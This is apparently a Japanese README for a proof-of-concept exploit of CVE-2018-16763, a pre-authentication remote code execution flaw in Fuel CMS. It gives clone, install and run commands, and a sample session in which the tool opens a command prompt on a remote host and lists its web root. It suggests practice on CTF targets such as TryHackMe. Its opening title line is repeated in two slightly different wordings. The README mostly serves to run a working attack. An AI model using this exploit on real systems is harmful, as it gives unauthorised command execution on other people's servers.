
CVE-2018-16763(Fuel CMS - 認証前リモートコード実行)用のProof-of-Concept(PoC)エクスプロイト。
CVE-2018-16763(Fuel CMS - 事前認証リモートコード実行)用の概念実証(PoC)エクスプロイト。
このPython 3プログラムは、Fuel CMSコンテンツ管理システムにおけるCVE-2018-16763の脆弱性のPoCとして機能します。具体的には、この脆弱性により、pages/select/filterパラメータを介したPHPコード評価(本PoCで実装済み)が可能になり、重大なシステム脆弱性である事前認証リモートコード実行につながります。
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
脆弱なターゲットに対してエクスプロイトスクリプトを実行します。 (所有しているターゲット、またはTryHackMe、HackTheBox、その他の倫理的ハッキングサイトが提供するターゲットに対してのみスクリプトを実行してください!) 詳細については、TryHackMeの「Ignite」チャレンジを確認することをお勧めします。また、exploit-db.comから脆弱なFuel CMSアプリケーションをダウンロードすることもできます。
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSE.mdファイルを参照してください。
Exploit-DBプログラム、VozecのPoCスクリプト、およびPadsala Trushalによって開発された元のPoCに強く影響を受けています。